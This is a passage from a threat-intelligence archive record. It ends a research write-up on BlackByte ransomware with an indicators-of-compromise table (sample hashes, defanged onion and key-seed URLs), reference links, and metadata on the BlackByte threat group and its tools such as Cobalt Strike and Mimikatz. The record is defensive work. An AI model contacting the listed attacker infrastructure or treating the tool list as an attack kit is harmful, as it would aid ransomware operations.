below:\r\nWin64.Ransom.Blackbyte\r\nIndicators of Compromise\r\nIoC Type  Value\r\nBlackByte v1 Packed Sample  1df11bc19aa52b623bdf15380e3fded56d8eb6fb7b53a2240779864b1a6474ad\r\nBlackByte v1 Packed Sample  388163c9ec1458c779849db891e17efb16a941ca598c4c3ac3a50a77086beb69\r\nBlackByte v1 Unpacked Sample  44a5e78fce5455579123af23665262b10165ac710a9f7538b764af76d7771550\r\nBlackByte v1 Unpacked Sample  6f36a4a1364cfb063a0463d9e1287248700ccf1e0d8e280e034b02cf3db3c442\r\nBlackByte v2 Packed Sample  ffc4d94a26ea7bcf48baffd96d33d3c3d53df1bb2c59567f6d04e02e7e2e5aaa\r\nBlackByte v2 Packed Sample  9103194d32a15ea9e8ede1c81960a5ba5d21213de55df52a6dac409f2e58bcfe\r\nBlackByte v2 Packed Sample  
e434ec347a8ea1f0712561bccf0153468a943e16d2cd792fbc72720bd0a8002e\r\nBlackByte v1 Onion URL  hxxp://7oukjxwkbnwyg7cekudzp66okrchbuubde2j3h6fkpis6izywoj2eqad.]onion\r\nBlackByte v2 Onion URL  hxxp://fyk4jl7jk6viteakzzrxntgzecnz4v6wxaefmbmtmcnscsl3tnwix6yd.]onion\r\nBlackByte v2 Onion URL  hxxp://p5quu5ujzzswxv4nxyuhgg3fjj2vy2a3zmtcowalkip2temdfadanlyd.]onion\r\nBlackByte v1 AES Key Seed URL  hxxps://185.93.6[.]31/mountain.png\r\nReferences\r\nhttps://redcanary.com/blog/blackbyte-ransomware/\r\nhttps://www.ic3.gov/Media/News/2022/220211.pdf\r\nhttps://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/blackbyte-ransomware-pt-1-in-depth-analysis/\r\nhttps://www.bleepingcomputer.com/forums/t/755181/blackbyte-ransomware-blackbyte-support-topic/\r\nSource: https://www.zscaler.com/blogs/security-research/analysis-blackbyte-ransomwares-go-based-variants",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://www.zscaler.com/blogs/security-research/analysis-blackbyte-ransomwares-go-based-variants"
	],
	"report_names": [
		"analysis-blackbyte-ransomwares-go-based-variants"
	],
	"threat_actors": [
		{
			"id": "4e453d66-9ecd-47d9-b63a-32fa5450f071",
			"created_at": "2024-06-19T02:03:08.077075Z",
			"updated_at": "2026-04-10T02:00:03.830523Z",
			"deleted_at": null,
			"main_name": "GOLD LOTUS",
			"aliases": [
				"BlackByte",
				"Hecamede "
			],
			"source_name": "Secureworks:GOLD LOTUS",
			"tools": [
				"BlackByte",
				"Cobalt Strike",
				"ExByte",
				"Mega",
				"RDP",
				"SoftPerfect Network Scanner"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "4e7fd07d-fcc5-459b-b678-45a7d9cda751",
			"created_at": "2025-04-23T02:00:55.174827Z",
			"updated_at": "2026-04-10T02:00:05.353712Z",
			"deleted_at": null,
			"main_name": "BlackByte",
			"aliases": [
				"BlackByte",
				"Hecamede"
			],
			"source_name": "MITRE:BlackByte",
			"tools": [
				"AdFind",
				"BlackByte Ransomware",
				"Exbyte",
				"Arp",
				"BlackByte 2.0 Ransomware",
				"PsExec",
				"Cobalt Strike",
				"Mimikatz"
			],
			"source_id": "MITRE",
			"reports": null
		}
	],
	"ts_created_at": 1775434107,
	"ts_updated_at": 1775791944,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/ddb360297952664ea21eeb89f768a4588d2d0625.pdf",
		"text": "https://archive.orkl.eu/ddb360297952664ea21eeb89f768a4588d2d0625.txt",
		"img": "https://archive.orkl.eu/ddb360297952664ea21eeb89f768a4588d2d0625.jpg"
	}
}